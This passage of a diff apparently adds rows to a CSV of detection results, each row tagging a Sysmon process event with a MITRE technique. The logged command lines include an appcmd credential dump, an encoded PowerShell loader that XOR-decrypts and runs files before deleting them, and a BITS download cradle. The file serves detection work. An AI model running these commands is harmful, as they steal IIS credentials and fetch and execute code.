+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;Filename: redirection.config&quot; /text:password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1086 ]  Powershell with Suspicious Argument,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include ( -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt, -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt) in event with Command Line (powershell  -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd  /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:03.966393Z"">
+    </TimeCreated>
+    <EventRecordID>4895</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:03.695</Data>
+    <Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00106B508600</Data>
+    <Data Name=""ProcessId"">6720</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell  -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
+    <Data Name=""ParentProcessId"">2948</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1197] BITS Jobs - Process,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell  -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:03.966393Z"">
+    </TimeCreated>
+    <EventRecordID>4895</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:03.695</Data>
+    <Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00106B508600</Data>
+    <Data Name=""ProcessId"">6720</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell  -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
+    <Data Name=""ParentProcessId"">2948</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-07T13:13:02.481447Z"">
+    </TimeCreated>
+    <EventRecordID>112815</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2888"" ThreadID=""3384"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-07 13:13:02.476</Data>
+    <Data Name=""ProcessGuid"">747F3D96-095E-5EB4-0000-0010D46F1800</Data>
+    <Data Name=""ProcessId"">5216</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;c:\Windows\System32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-08F7-5EB4-0000-0020BAEC0200</Data>
+    <Data Name=""LogonId"">0x2ecba</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-095E-5EB4-0000-001002511800</Data>
+    <Data Name=""ParentProcessId"">6396</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\changepk.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\ChangePk.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell  -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:03.966393Z"">
+    </TimeCreated>
+    <EventRecordID>4895</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:03.695</Data>
+    <Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-00106B508600</Data>
+    <Data Name=""ProcessId"">6720</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell  -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
+    <Data Name=""ParentProcessId"">2948</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564913810.45591,2019-08-04T14:16:50.455910+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c start C:\Windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-04T10:16:50.009124Z"">
+    </TimeCreated>
+    <EventRecordID>5950</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-04 10:16:49.960</Data>
+    <Data Name=""ProcessGuid"">747F3D96-B091-5D46-0000-001081F71104</Data>
+    <Data Name=""ProcessId"">820</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c start C:\Windows\system32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
+    <Data Name=""LogonId"">0x18d3b3</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-B080-5D46-0000-0010D4EA0F04</Data>
+    <Data Name=""ParentProcessId"">2112</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WSReset.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\WSReset.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1595802375.141764,2020-07-27T02:26:15.141764+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-07-26T22:26:14.523075Z"">
+    </TimeCreated>
+    <EventRecordID>339222</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3332"" ThreadID=""4376"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-07-26 22:26:14.521</Data>
+    <Data Name=""ProcessGuid"">747F3D96-0306-5F1E-0000-0010E15F3100</Data>
+    <Data Name=""ProcessId"">3660</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">cmd</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-F938-5F1D-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-F938-5F1D-0000-00104B500000</Data>
+    <Data Name=""ParentProcessId"">584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\winlogon.exe</Data>
+    <Data Name=""ParentCommandLine"">winlogon.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.555423,2019-05-27T05:29:20.555423+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;. )&quot; /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:20.555423Z"">
+    </TimeCreated>
+    <EventRecordID>5991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:20.475</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-0010F2EDFF00</Data>
+    <Data Name=""ProcessId"">4012</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir &quot;. )&quot; /text:password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc 